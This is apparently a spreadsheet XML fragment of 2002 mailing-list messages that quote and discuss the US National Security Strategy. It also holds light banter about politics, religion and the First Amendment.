dignity: the rule of law; limits on the absolute power of the state; 
free speech; freedom of worship; equal justice; respect for women; 
religious and ethnic tolerance; and respect for private property.These demands can be met in many ways. America's constitution has served 
us well. Many other nations, with different histories and cultures, 
facing different circumstances, have successfully incorporated these 
core principles into their own systems of governance. History has not 
been kind to those nations which ignored or flouted the rights and 
aspirations of their people.Our own history is a long struggle to live up to our ideals. But even in 
our worst moments, the principles enshrined in the Declaration of 
Independence were there to guide us. As a result, America is not just a 
stronger, but is a freer and more just society.Today, these ideals are a lifeline to lonely defenders of liberty. And 
when openings arrive, we can encourage change -- as we did in central 
and eastern Europe between 1989 and 1991, or in Belgrade in 2000. When 
we see democratic processes take hold among our friends in Taiwan or in 
the Republic of Korea, and see elected leaders replace generals in Latin 
America and Africa, we see examples of how authoritarian systems can 
evolve, marrying local history and traditions with the principles we all 
cherish.Embodying lessons from our past and using the opportunity we have today, 
the national security strategy of the United States must start from 
these core beliefs and look outward for possibilities to expand liberty.Our principles will guide our government's decisions about international 
cooperation, the character of our foreign assistance, and the allocation 
of resources. They will guide our actions and our words in international 
bodies.We will:*	speak out honestly about violations of the nonnegotiable demands of 
human dignity using our voice and vote in international institutions to 
advance freedom;*	use our foreign aid to promote freedom and support those who 
struggle non-violently for it, ensuring that nations moving toward 
democracy are rewarded for the steps they take;*	make freedom and the development of democratic institutions key 
themes in our bilateral relations, seeking solidarity and cooperation 
from other democracies while we press governments that deny human rights 
to move toward a better future; and*	take special efforts to promote freedom of religion and conscience 
and defend it from encroachment by repressive governments.
We will champion the cause of human dignity and oppose those who resist 
it.III. Strengthen Alliances to Defeat Global Terrorism and Work to Prevent 
Attacks Against Us and Our Friends
"Just three days removed from these events, Americans do not yet have 
the distance of history. But our responsibility to history is already 
clear: to answer these attacks and rid the world of evil. War has been 
waged against us by stealth and deceit and murder. This nation is 
peaceful, but fierce when stirred to anger. The conflict was begun on 
the timing and terms of others. It will end in a way, and at an hour, of 
our choosing."President Bush
Washington, D.C. (The National Cathedral)
September 14, 2001The United States of America is fighting a war against terrorists of 
global reach. The enemy is not a single political regime or person or 
religion or ideology. The enemy is terrorism -- premeditated, 
politically motivated violence perpetrated against innocents.In many regions, legitimate grievances prevent the emergence of a 
lasting peace. Such grievances deserve to be, and must be, addressed 
within a political process. But no cause justifies terror. The United 
States will make no concessions to terrorist demands and strike no deals 
with them. We make no distinction between terrorists and those who 
knowingly harbor or provide aid to them.The struggle against global terrorism is different from any other war in 
our history. It will be fought on many fronts against a particularly 
elusive enemy over an extended period of time. Progress will come 
through the persistent accumulation of successes -- some seen, some 
unseen.Today our enemies have seen the results of what civilized nations can, 
and will, do against regimes that harbor, support, and use terrorism to 
achieve their political goals. Afghanistan has been liberated; coalition 
forces continue to hunt down the Taliban and al-Qaida. But it is not 
only this battlefield on which we will engage terrorists. Thousands of 
trained terrorists remain at large with cells in North America, South 
America, Europe, Africa, the Middle East, and across Asia.Our priority will be first to disrupt and destroy terrorist 
organizations of global reach and attack their leadership; command, 
control, and communications; material support; and finances. This will 
have a disabling effect upon the terrorists' ability to plan and operate.We will continue to encourage our regional partners to take up a 
coordinated effort that isolates the terrorists. Once the regional 
campaign localizes the threat to a particular state, we will help ensure 
the state has the military, law enforcement, political, and financial 
tools necessary to finish the task.The United States will continue to work with our allies to disrupt the 
financing of terrorism. We will identify and block the sources of 
funding for terrorism, freeze the assets of terrorists and those who 
support them, deny terrorists access to the international financial 
system, protect legitimate charities from being abused by terrorists, 
and prevent the movement of terrorists' assets through alternative 
financial networks.However, this campaign need not be sequential to be effective, the 
cumulative effect across all regions will help achieve the results we 
seek.We will disrupt and destroy terrorist organizations by:*	direct and continuous action using all the elements of national and 
international power. Our immediate focus will be those terrorist 
organizations of global reach and any terrorist or state sponsor of 
terrorism which attempts to gain or use weapons of mass destruction 
(WMD) or their precursors;*	defending the United States, the American people, and our interests 
at home and abroad by identifying and destroying the threat before it 
reaches our borders. While the United States will constantly strive to 
enlist the support of the international community, we will not hesitate 
to act alone, if necessary, to exercise our right of self-defense by 
acting preemptively against such terrorists, to prevent them from doing 
harm against our people and our country; and*	denying further sponsorship, support, and sanctuary to terrorists 
by convincing or compelling states to accept their sovereign 
responsibilities.
We will also wage a war of ideas to win the battle against international 
terrorism. This includes:*	using the full influence of the United States, and working closely 
with allies and friends, to make clear that all acts of terrorism are 
illegitimate so that terrorism will be viewed in the same light as 
slavery, piracy, or genocide: behavior that no respectable government 
can condone or support and all must oppose;*	supporting moderate and modern government, especially in the Muslim 
world, to ensure that the conditions and ideologies that promote 
terrorism do not find fertile ground in any nation;*	diminishing the underlying conditions that spawn terrorism by 
enlisting the international community to focus its efforts and resources 
on areas most at risk; and*	using effective public diplomacy to promote the free flow of 
information and ideas to kindle the hopes and aspirations of freedom of 
those in societies ruled by the sponsors of global terrorism.
While we recognize that our best defense is a good offense we are also 
strengthening America's homeland security to protect against and deter 
attack.This Administration has proposed the largest government reorganization 
since the Truman Administration created the National Security Council 
and the Department of Defense. Centered on a new Department of Homeland 
Security and including a new unified military command and a fundamental 
reordering of the FBI, our comprehensive plan to secure the homeland 
encompasses every level of government and the cooperation of the public 
and the private sector.This strategy will turn adversity into opportunity. For example, 
emergency management systems will be better able to cope not just with 
terrorism but with all hazards. Our medical system will be strengthened 
to manage not just bioterror, but all infectious diseases and 
mass-casualty dangers. Our border controls will not just stop 
terrorists, but improve the efficient movement of legitimate traffic.While our focus is protecting America, we know that to defeat terrorism 
in today's globalized world we need support from our allies and friends. 
Wherever possible, the United States will rely on regional organizations 
and state powers to meet their obligations to fight terrorism. Where 
governments find the fight against terrorism beyond their capacities, we 
will match their willpower and their resources with whatever help we and 
our allies can provide.As we pursue the terrorists in Afghanistan, we will continue to work 
with international organizations such as the United Nations, as well as 
non-governmental organizations, and other countries to provide the 
humanitarian, political, economic, and security assistance necessary to 
rebuild Afghanistan so that it will never again abuse its people, 
threaten its neighbors, and provide a haven for terroristsIn the war against global terrorism, we will never forget that we are 
ultimately fighting for our democratic values and way of life. Freedom 
and fear are at war, and there will be no quick or easy end to this 
conflict. In leading the campaign against terrorism, we are forging new, 
productive international relationships and redefining existing ones in 
ways that meet the challenges of the twenty-first century.IV. Work with Others To Defuse Regional Conflicts
"We build a world of justice, or we will live in a world of coercion. 
The magnitude of our shared responsibilities makes our disagreements 
look so small."President Bush
Berlin, Germany
May 23, 2002Concerned nations must remain actively engaged in critical regional 
disputes to avoid explosive escalation and minimize human suffering. In 
an increasingly interconnected world, regional crisis can strain our 
alliances, rekindle rivalries among the major powers, and create 
horrifying affronts to human dignity. When violence erupts and states 
falter, the United States will work with friends and partners to 
alleviate suffering and restore stability.No doctrine can anticipate every circumstance in which U.S. action -- 
direct or indirect -- is warranted. We have finite political, economic, 
and military resources to meet our global priorities. The United States 
will approach each case with these strategic principles in mind:*	The United States should invest time and resources into building 
international relationships and institutions that can help manage local 
crises when they emerge.*	The United States should be realistic about its ability to help 
those who are unwilling or unready to help themselves. Where and when 
people are ready to do their part, we will be willing to move decisively.
Policies in several key regions offer some illustrations of how we will 
apply these principles:The Israeli-Palestinian conflict is critical because of the toll of 
human suffering, because of America's close relationship with the state 
of Israel and key Arab states, and because of that region's importance 
to other global priorities of the United States. There can be no peace 
for either side without freedom for both sides. America stands committed 
to an independent and democratic Palestine, living beside Israel in 
peace and security. Like all other people, Palestinians deserve a 
government that serves their interests, and listens to their voices, and 
counts their votes. The United States will continue to encourage all 
parties to step up to their responsibilities as we seek a just and 
comprehensive settlement to the conflict.The United States, the international donor community, and the World Bank 
stand ready to work with a reformed Palestinian government on economic 
development, increased humanitarian assistance and a program to 
establish, finance, and monitor a truly independent judiciary. If 
Palestinians embrace democracy, and the rule of law, confront 
corruption, and firmly reject terror, they can count on American support 
for the creation of a Palestinian state.Israel also has a large stake in the success of a democratic Palestine. 
Permanent occupation threatens Israel's identity and democracy. So the 
United States continues to challenge Israeli leaders to take concrete 
steps to support the emergence of a viable, credible Palestinian state. 
As there is progress towards security, Israel forces need to withdraw 
fully to positions they held prior to September 28, 2000. And consistent 
with the recommendations of the Mitchell Committee, Israeli settlement 
activity in the occupied territories must stop. As violence subsides, 
freedom of movement should be restored, permitting innocent Palestinians 
to resume work and normal life. The United States can play a crucial 
role but, ultimately, lasting peace can only come when Israelis and 
Palestinians resolve the issues and end the conflict between them.In South Asia, the United States has also emphasized the need for India 
and Pakistan to resolve their disputes. This administration invested 
time and resources building strong bilateral relations with India and 
Pakistan. These strong relations then gave us leverage to play a 
constructive role when tensions in the region became acute. With 
Pakistan, our bilateral relations have been bolstered by Pakistan's 
choice to join the war against terror and move toward building a more 
open and tolerant society. The Administration sees India's potential to 
become one of the great democratic powers of the twenty-first century 
and has worked hard to transform our relationship accordingly. Our 
involvement in this regional dispute, building on earlier investments in 
bilateral relations, looks first to concrete steps by India and Pakistan 
that can help defuse military confrontation.Indonesia took courageous steps to create a working democracy and 
respect for the rule of law. By tolerating ethnic minorities, respecting 
the rule of law, and accepting open markets, Indonesia may be able to 
employ the engine of opportunity that has helped lift some of its 
neighbors out of poverty and desperation. It is the initiative by 
Indonesia that allows U.S. assistance to make a difference.In the Western Hemisphere we have formed flexible coalitions with 
countries that share our priorities, particularly Mexico, Brazil, 
Canada, Chile, and Colombia. Together we will promote a truly democratic 
hemisphere where our integration advances security, prosperity, 
opportunity, and hope. We will work with regional institutions, such as 
the Summit of the Americas process, the Organization of American States 
(OAS), and the Defense Ministerial of the Americas for the benefit of 
the entire hemisphere.Parts of Latin America confront regional conflict, especially arising 
from the violence of drug cartels and their accomplices. This conflict 
and unrestrained narcotics trafficking could imperil the health and 
security of the United States. Therefore we have developed an active 
strategy to help the Andean nations adjust their economies, enforce 
their laws, defeat terrorist organizations, and cut off the supply of 
drugs, while -- as important -- we work to reduce the demand for drugs 
in our own country.In Colombia, we recognize the link between terrorist and extremist 
groups that challenge the security of the state and drug trafficking 
activities that help finance the operations of such groups. We are 
working to help Colombia defend its democratic institutions and defeat 
illegal armed groups of both the left and right by extending effective 
sovereignty over the entire national territory and provide basic 
security to the Colombian people.In Africa, promise and opportunity sit side by side with disease, war, 
and desperate poverty. This threatens both a core value of the United 
States -- preserving human dignity -- and our strategic priority -- 
combating global terror. American interests and American principles, 
therefore, lead in the same direction: we will work with others for an 
African continent that lives in liberty, peace, and growing prosperity. 
Together with our European allies, we must help strengthen Africa's 
fragile states, help build indigenous capability to secure porous 
borders, and help build up the law enforcement and intelligence 
infrastructure to deny havens for terrorists.An ever more lethal environment exists in Africa as local civil wars 
spread beyond borders to create regional war zones. Forming coalitions 
of the willing and cooperative security arrangements are key to 
confronting these emerging transnational threats.Africa's great size and diversity requires a security strategy that 
focuses bilateral engagement, and builds coalitions of the willing. This 
administration will focus on three interlocking strategies for the 
region:*	countries with major impact on their neighborhood such as South 
Africa, Nigeria, Kenya, and Ethiopia are anchors for regional engagement 
and require focused attention;*	coordination with European allies and international institutions is 
essential for constructive conflict mediation and successful peace 
operations; and*	Africa's capable reforming states and sub-regional organizations 
must be strengthened as the primary means to address transnational 
threats on a sustained basis.
Ultimately the path of political and economic freedom presents the 
surest route to progress in sub-Saharan Africa, where most wars are 
conflicts over material resources and political access often tragically 
waged on the basis of ethnic and religious difference. The transition to 
the African Union with its </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "G" == Geege Schuman  writes:    G&gt; SURELY you meant political extremes and not politics?  baisley?
    G&gt; help me out here.OK, but only if you also meant religious and alcoholic extremes ;)When the political canvassers come to my door during the campaigns,
I always wonder why cigarette packages are labelled with warnings
whereas political brochures are not; the statistics clearly show
which is the greater, more senseless, and more preventable killer.&gt;&gt;&gt;&gt;&gt; "R" == Russell Turpin  writes:    R&gt; It's difficult to measure which is the greater liability in a
    R&gt; potential mate, religiosity or alcoholism.    G&gt; Or politics.
-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">GLM&gt; whereas political brochures are not; the statistics clearly show
GLM&gt; which is the greater, more senseless, and more preventable killer.So outside of the occasional hit by a mafia-boy, where's the killing?If you said mind-numbing, rights destroying, cynic-making force, I'd
agree.  But, does politics really kill?I'm bitter atm.  Two reasons mostly:
1) I was listening to what I heard being the First Amendment
Foundation? on NPR releasing a poll noting that their
very-unscientific poll found that half the population thinks the first
amendment goes too far.   And (their quote was 1 in 5, but I'm finding
sources of 1 in 4) of the population don't even know what rights are
guaranteed in the first amendment.2) I have a paper due that will make or break my law school career.  I
hate being a forced sheep.baaaa....
&gt;&gt;&gt;&gt;&gt;&gt; "R" == Russell Turpin  writes:GLM&gt;     R&gt; It's difficult to measure which is the greater liability in a
GLM&gt;     R&gt; potential mate, religiosity or alcoholism.GLM&gt;     G&gt; Or politics.-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">And of course I forget the link that I did find.http://www.constitutioncenter.org/sections/news/8b4.aspNeither NPR nor the first amendment foundation seem to have the
article I was looking for declaring the study.Even if its half true, its still frightening.It makes me want to pass out CATO bibles...-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy:
&gt;OK, but only if you also meant religious and alcoholic extremes ;)Since it was my quip, I'll point out that I used
the term "alcoholism," implying addiction. I
drink. I'm not an alcoholic. Most people who drink
don't go to AA meetings. Most people who go to AA
meetings do (try very hard) not to drink.As to religion, I think it is harmful and risky in
almost any degree. Were I single, I might consider
potential mates who partook of the less irrational
or more light-hearted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That's a
difficult difference for two parents to
reconcile.Fortunately, I am long and happily enamored of
someone who has no religious tendencies.
_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com
</t>
  </si>
  <si>
    <t xml:space="preserve">You around?
C-- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt; help me out here.
 &gt; You around?Barely, but don't call me Shirley.  ;-)I'm sleeping with one eye open.I wouldn't have married me if I'd known how extremely shallow my 
politics are."The ward lurks in Wisteria's maze."Cheers,
Wayne
</t>
  </si>
  <si>
    <t xml:space="preserve">
"Free trade and free markets have proven their ability to lift whole
societies out of poverty"
I'm not a socio-political/history buff - does anybody have some clear
examples?
----- Original Message -----
From: "Rohit Khare" 
To: 
Sent: Friday, September 20, 2002 5:10 PM
Subject: sed /s/United States/Roman Empire/g
&gt; &gt; A world where some live in comfort and plenty, while half of the human
&gt; &gt; race lives on less than $2 a day, is neither just nor stable.
&gt;
&gt; Absolutely correct. Perhaps the most fundamental thing to realize about
&gt; life on Earth today.
&gt;
&gt; The following is a fascinating document of official Government policy
&gt; that bears close reading. It is the aspirations of a wonderful nation in
&gt; an imperfect world.
&gt;
&gt; &gt;  The war on terrorism is not a clash of civilizations. It does,
&gt; &gt; however, reveal the clash inside a civilization, a battle for the
&gt; &gt; future of the Muslim world. This is a struggle of ideas and this is an
&gt; &gt; area where America must excel.
&gt;
&gt; I was recently at a lecture about the surprising success of Radio Sawa,
&gt; our new music-and-news channel for 15-30 year old Arabs. It's #1 in
&gt; practically every market it's entered, nearing 90% listenership in
&gt; Amman. And it's even beginning to be trusted for news, well past BBC and
&gt; taking share from every other government broadcaster.
&gt;
&gt; It is as hard to imagine America losing a war of ideas in the long-term
&gt; as it is to imagine America making any headway at all in the short term.
&gt;
&gt; Many of you may disagree, but I found the document below surprisingly
&gt; centrist. If you know the code, you can hear clearly partisan tones, re:
&gt; ICC, Taiwan Relations Act, etc. But, still, this is as much a Democratic
&gt; platform as not. Africa and AIDS take up more mindshare than I feared
&gt; they might.
&gt;
&gt; As you read, replace "United States" with "Roman Empire" and it may make
&gt; as much sense, in the long view of history. I don't know how proud to be
&gt; about that, but it is telling. Sometime I daydream that the President
&gt; might sit down with the nation with Perotista flip charts and explain to
&gt; our citizens the sheer vastness of our 700+ military installations
&gt; overseas and what they do for us. It would be a powerful education on
&gt; how engaged we are in the world around us.
&gt;
&gt; Heck, I'd love to see a real-time map of Federal expenditures around the
&gt; globe, a softly glowing necklace of embassies, carriers, arctic research
&gt; stations, hotels, golf courses, warehouses, libraries, clinics and all
&gt; the rest of the influence a trillion dollars here or there can buy.
&gt;
&gt; Of course, this still doesn't leave me any more comfortable with the
&gt; real news in this document: the Bush Doctrine for pre-emptive strikes.
&gt; I'd sooner repeal the Church amendments on covert action than permit
&gt; such a principle to be loosed upon the world.
&gt;
&gt; Rohit
&gt;
&gt; -----------------------------------------------------
&gt; September 20, 2002
&gt;
&gt; Full Text: Bush's National Security Strategy
&gt;
&gt; Following is the full text of President Bush's new national security
&gt; strategy. The document, entitled "The National Security Strategy of the
&gt; United States," will soon be transmitted to Congress as a declaration of
&gt; the Administration's policy.
&gt;
&gt; INTRODUCTION
&gt;
&gt; THE great struggles of the twentieth century between liberty and
&gt; totalitarianism ended with a decisive victory for the forces of
&gt; freedom -- and a single sustainable model for national success: freedom,
&gt; democracy, and free enterprise. In the twenty-first century, only
&gt; nations that share a commitment to protecting basic human rights and
&gt; guaranteeing political and economic freedom will be able to unleash the
&gt; potential of their people and assure their future prosperity. People
&gt; everywhere want to say what they think; choose who will govern them;
&gt; worship as they please; educate their children -- male and female; own
&gt; property; and enjoy the benefits of their labor. These values of freedom
&gt; are right and true for every person, in every society -- and the duty of
&gt; protecting these values against their enemies is the common calling of
&gt; freedom-loving people across the globe and across the ages.
&gt;
&gt; Today, the United States enjoys a position of unparalleled military
&gt; strength and great economic and political influence. In keeping with our
&gt; heritage and principles, we do not use our strength to press for
&gt; unilateral advantage. We seek instead to create a balance of power that
&gt; favors human freedom: conditions in which all nations and all societies
&gt; can choose for themselves the rewards and challenges of political and
&gt; economic liberty. By making the world safer, we allow the people of the
&gt; world to make their own lives better. We will defend this just peace
&gt; against threats from terrorists and tyrants. We will preserve the peace
&gt; by building good relations among the great powers. We will extend the
&gt; peace by encouraging free and open societies on every continent.
&gt;
&gt; Defending our Nation against its enemies is the first and fundamental
&gt; commitment of the Federal Government. Today, that task has changed
&gt; dramatically. Enemies in the past needed great armies and great
&gt; industrial capabilities to endanger America. Now, shadowy networks of
&gt; individuals can bring great chaos and suffering to our shores for less
&gt; than it costs to purchase a single tank. Terrorists are organized to
&gt; penetrate open societies and to turn the power of modern technologies
&gt; against us.
&gt;
&gt; To defeat this threat we must make use of every tool in our arsenal --
&gt; from better homeland defenses and law enforcement to intelligence and
&gt; cutting off terrorist financing. The war against terrorists of global
&gt; reach is a global enterprise of uncertain duration. America will help
&gt; nations that need our assistance in combating terror. And America will
&gt; hold to account nations that are compromised by terror -- because the
&gt; allies of terror are the enemies of civilization. The United States and
&gt; countries cooperating with us must not allow the terrorists to develop
&gt; new home bases. Together, we will seek to deny them sanctuary at every
&gt; turn.
&gt;
&gt; The gravest danger our Nation faces lies at the crossroads of radicalism
&gt; and technology. Our enemies have openly declared that they are seeking
&gt; weapons of mass destruction, and evidence indicates that they are doing
&gt; so with determination. The United States will not allow these efforts to
&gt; succeed. We will build defenses against ballistic missiles and other
&gt; means of delivery. We will cooperate with other nations to deny,
&gt; contain, and curtail our enemies' efforts to acquire dangerous
&gt; technologies. And, as a matter of common sense and self-defense, America
&gt; will act against such emerging threats before they are fully formed. We
&gt; cannot defend America and our friends by hoping for the best. So we must
&gt; be prepared to defeat our enemies' plans, using the best intelligence
&gt; and proceeding with deliberation. History will judge harshly those who
&gt; saw this coming danger but failed to act. In the new world we have
&gt; entered, the only path to safety is the path of action.
&gt;
&gt; As we defend the peace, we will also take advantage of an historic
&gt; opportunity to preserve the peace. Today, the international community
&gt; has the best chance since the rise of the nation-state in the
&gt; seventeenth century to build a world where great powers compete in peace
&gt; instead of continually prepare for war. Today, the world's great powers
&gt; find ourselves on the same side -- united by common dangers of terrorist
&gt; violence and chaos. The United States will build on these common
&gt; interests to promote global security. We are also increasingly united by
&gt; common values. Russia is in the midst of a hopeful transition, reaching
&gt; for its democratic future and a partner in the war on terror. Chinese
&gt; leaders are discovering that economic freedom is the only source of
&gt; national wealth. In time, they will find that social and political
&gt; freedom is the only source of national greatness. America will encourage
&gt; the advancement of democracy and economic openness in both nations,
&gt; because these are the best foundations for domestic stability and
&gt; international order. We will strongly resist aggression from other great
&gt; powers -- even as we welcome their peaceful pursuit of prosperity,
&gt; trade, and cultural advancement.
&gt;
&gt; Finally, the United States will use this moment of opportunity to extend
&gt; the benefits of freedom across the globe. We will actively work to bring
&gt; the hope of democracy, development, free markets, and free trade to
&gt; every corner of the world. The events of September 11, 2001, taught us
&gt; that weak states, like Afghanistan, can pose as great a danger to our
&gt; national interests as strong states. Poverty does not make poor people
&gt; into terrorists and murderers. Yet poverty, weak institutions, and
&gt; corruption can make weak states vulnerable to terrorist networks and
&gt; drug cartels within their borders.
&gt;
&gt; The United States will stand beside any nation determined to build a
&gt; better future by seeking the rewards of liberty for its people. Free
&gt; trade and free markets have proven their ability to lift whole societies
&gt; out of poverty -- so the United States will work with individual
&gt; nations, entire regions, and the entire global trading community to
&gt; build a world that trades in freedom and therefore grows in prosperity.
&gt; The United States will deliver greater development assistance through
&gt; the New Millennium Challenge Account to nations that govern justly,
&gt; invest in their people, and encourage economic freedom. We will also
&gt; continue to lead the world in efforts to reduce the terrible toll of
&gt; AIDS and other infectious diseases.
&gt;
&gt; In building a balance of power that favors freedom, the United States is
&gt; guided by the conviction that all nations have important
&gt; responsibilities. Nations that enjoy freedom must actively fight terror.
&gt; Nations that depend on international stability must help prevent the
&gt; spread of weapons of mass destruction. Nations that seek international
&gt; aid must govern themselves wisely, so that aid is well spent. For
&gt; freedom to thrive, accountability must be expected and required.
&gt;
&gt; We are also guided by the conviction that no nation can build a safer,
&gt; better world alone. Alliances and multilateral institutions can multiply
&gt; the strength of freedom-loving nations. The United States is committed
&gt; to lasting institutions like the United Nations, the World Trade
&gt; Organization, the Organization of American States, and NATO as well as
&gt; other long-standing alliances. Coalitions of the willing can augment
&gt; these permanent institutions. In all cases, international obligations
&gt; are to be taken seriously. They are not to be undertaken symbolically to
&gt; rally support for an ideal without furthering its attainment.
&gt;
&gt; Freedom is the non-negotiable demand of human dignity; the birthright of
&gt; every person -- in every civilization. Throughout history, freedom has
&gt; been threatened by war and terror; it has been challenged by the
&gt; clashing wills of powerful states and the evil designs of tyrants; and
&gt; it has been tested by widespread poverty and disease. Today, humanity
&gt; holds in its hands the opportunity to further freedom's triumph over all
&gt; these foes. The United States welcomes our responsibility to lead in
&gt; this great mission.
&gt;
&gt; I. Overview of America's International Strategy
&gt;
&gt;
&gt; "Our Nation's cause has always been larger than our Nation's defense. We
&gt; fight, as we always fight, for a just peace -- a peace that favors
&gt; liberty. We will defend the peace against the threats from terrorists
&gt; and tyrants. We will preserve the peace by building good relations among
&gt; the great powers. And we will extend the peace by encouraging free and
&gt; open societies on every continent."
&gt;
&gt;
&gt;
&gt;
&gt;
&gt;
&gt; President Bush
&gt; West Point, New York
&gt; June 1, 2002
&gt;
&gt;
&gt;
&gt; The United States possesses unprecedented -- and unequaled -- strength
&gt; and influence in the world. Sustained by faith in the principles of
&gt; liberty, and the value of a free society, this position comes with
&gt; unparalleled responsibilities, obligations, and opportunity. The great
&gt; strength of this nation must be used to promote a balance of power that
&gt; favors freedom.
&gt;
&gt; For most of the twentieth century, the world was divided by a great
&gt; struggle over ideas: destructive totalitarian visions versus freedom and
&gt; equality.
&gt;
&gt; That great struggle is over. The militant visions of class, nation, and
&gt; race which promised utopia and delivered misery have been defeated and
&gt; discredited. America is now threatened less by conquering states than we
&gt; are by failing ones. We are menaced less by fleets and armies than by
&gt; catastrophic technologies in the hands of the embittered few. We must
&gt; defeat these threats to our Nation, allies, and friends.
&gt;
&gt; This is also a time of opportunity for America. We will work to
&gt; translate this moment of influence into decades of peace, prosperity,
&gt; and liberty. The U.S. national security strategy will be based on a
&gt; distinctly American internationalism that reflects the union of our
&gt; values and our national interests. The aim of this strategy is to help
&gt; make the world not just safer but better. Our goals on the path to
&gt; progress are clear: political and economic freedom, peaceful relations
&gt; with other states, and respect for human dignity.
&gt;
&gt; And this path is not America's alone. It is open to all.
&gt;
&gt; To achieve these goals, the United States will:
&gt;
&gt; * champion aspirations for human dignity;
&gt;
&gt; * strengthen alliances to defeat global terrorism and work to prevent
&gt; attacks against us and our friends;
&gt;
&gt; * work with others to defuse regional conflicts;
&gt;
&gt; * prevent our enemies from threatening us, our allies, and our
&gt; friends, with weapons of mass destruction;
&gt;
&gt; * ignite a new era of global economic growth through free markets and
&gt; free trade;
&gt;
&gt; * expand the circle of development by opening societies and building
&gt; the infrastructure of democracy;
&gt;
&gt; * develop agendas for cooperative action with other main centers of
&gt; global power; and
&gt;
&gt; * transform America's national security institutions to meet the
&gt; challenges and opportunities of the twenty-first century.
&gt;
&gt;
&gt; II. Champion Aspirations for Human Dignity
&gt;
&gt;
&gt; "Some worry that it is somehow undiplomatic or impolite to speak the
&gt; language of right and wrong. I disagree. Different circumstances require
&gt; different methods, but not different moralities."
&gt;
&gt;
&gt;
&gt;
&gt;
&gt; President Bush
&gt; West Point, New York
&gt; June 1, 2002
&gt;
&gt;
&gt;
&gt; In pursuit of our goals, our first imperative is to clarify what we
&gt; stand for: the United States must defend liberty and justice because
&gt; these principles are right and true for all people everywhere. No nation
&gt; owns these aspirations, and no nation is exempt from them. Fathers and
&gt; mothers in all societies want their children to be educated and to live
&gt; free from poverty and violence. No people on earth yearn to be
&gt; oppressed, aspire to servitude, or eagerly await the midnight knock of
&gt; the secret police.
&gt;
&gt; America must stand firmly for the nonnegotiable demands of human
&gt; dignity: the rule of law; limits on the absolute power of the state;
&gt; free speech; freedom of worship; equal justice; respect for women;
&gt; religious and ethnic tolerance; and respect for private property.
&gt;
&gt; These demands can be met in many ways. America's constitution has served
&gt; us well. Many other nations, with different histories and cultures,
&gt; facing different circumstances, have successfully incorporated these
&gt; core principles into their own systems of governance. History has not
&gt; been kind to those nations which ignored or flouted the rights and
&gt; aspirations of their people.
&gt;
&gt; Our own history is a long struggle to live up to our ideals. But even in
&gt; our worst moments, the principles enshrined in the Declaration of
&gt; Independence were there to guide us. As a result, America is not just a
&gt; stronger, but is a freer and more just society.
&gt;
&gt; Today, these ideals are a lifeline to lonely defenders of liberty. And
&gt; when openings arrive, we can encourage change -- as we did in central
&gt; and eastern Europe between 1989 and 1991, or in Belgrade in 2000. When
&gt; we see democratic processes take hold among our friends in Taiwan or in
&gt; the Republic of Korea, and see elected leaders replace generals in Latin
&gt; America and Africa, we see examples of how authoritarian systems can
&gt; evolve, marrying local history and traditions with the principles we all
&gt; cherish.
&gt;
&gt; Embodying lessons from our past and using the opportunity we have today,
&gt; the national security strategy of the United States must start from
&gt; these core beliefs and look outward for possibilities to expand liberty.
&gt;
&gt; Our principles will guide our government's decisions about international
&gt; cooperation, the character of our foreign assistance, and the allocation
&gt; of resources. They will guide our actions and our words in international
&gt; bodies.
&gt;
&gt; We will:
&gt;
&gt; * speak out honestly about violations of the nonnegotiable demands of
&gt; human dignity using our voice and vote in international institutions to
&gt; advance freedom;
&gt;
&gt; * use our foreign aid to promote freedom and support those who
&gt; struggle non-violently for it, ensuring that nations moving toward
&gt; democracy are rewarded for the steps they take;
&gt;
&gt; * make freedom and the development of democratic institutions key
&gt; themes in our bilateral relations, seeking solidarity and cooperation
&gt; from other democracies while we press governments that deny human rights
&gt; to move toward a better future; and
&gt;
&gt; * take special efforts to promote freedom of religion and conscience
&gt; and defend it from encroachment by repressive governments.
&gt;
&gt;
&gt; We will champion the cause of human dignity and oppose those who resist
&gt; it.
&gt;
&gt; III. Strengthen Alliances to Defeat Global Terrorism and Work to Prevent
&gt; Attacks Against Us and Our Friends
&gt;
&gt;
&gt; "Just three days removed from these events, Americans do not yet have
&gt; the distance of history. But our responsibility to history is already
&gt; clear: to answer these attacks and rid the world of evil. War has been
&gt; waged against us by stealth and deceit and murder. This nation is
&gt; peaceful, but fierce when stirred to anger. The conflict was begun on
&gt; the timing and terms of others. It will end in a way, and at an hour, of
&gt; our choosing."
&gt;
&gt;
&gt;
&gt;
&gt;
&gt; President Bush
&gt; Washington, D.C. (The National Cathedral)
&gt; September 14, 2001
&gt;
&gt;
&gt;
&gt; The United States of America is fighting a war against terrorists of
&gt; global reach. The enemy is not a single political regime or person or
&gt; religion or ideology. The enemy is terrorism -- premeditated,
&gt; politically motivated violence perpetrated against innocents.
&gt;
&gt; In many regions, legitimate grievances prevent the emergence of a
&gt; lasting peace. Such grievances deserve to be, and must be, addressed
&gt; within a political process. But no cause justifies terror. The United
&gt; States will make no concessions to terrorist demands and strike no deals
&gt; with them. We make no distinction between terrorists and those who
&gt; knowingly harbor or provide aid to them.
&gt;
&gt; The struggle against global terrorism is different from any other war in
&gt; our history. It will be fought on many fronts against a particularly
&gt; elusive enemy over an extended period of time. Progress will come
&gt; through the persistent accumulation of successes -- some seen, some
&gt; unseen.
&gt;
&gt; Today our enemies have seen the results of what civilized nations can,
&gt; and will, do against regimes that harbor, support, and use terrorism to
&gt; achieve their political goals. Afghanistan has been liberated; coalition
&gt; forces continue to hunt down the Taliban and al-Qaida. But it is not
&gt; only this battlefield on which we will engage terrorists. Thousands of
&gt; trained terrorists remain at large with cells in North America, South
&gt; America, Europe, Africa, the Middle East, and across Asia.
&gt;
&gt; Our priority will be first to disrupt and destroy terrorist
&gt; organizations of global reach and attack their leadership; command,
&gt; control, and communications; material support; and finances. This will
&gt; have a disabling effect upon the terrorists' ability to plan and operate.
&gt;
&gt; We will continue to encourage our regional partners to take up a
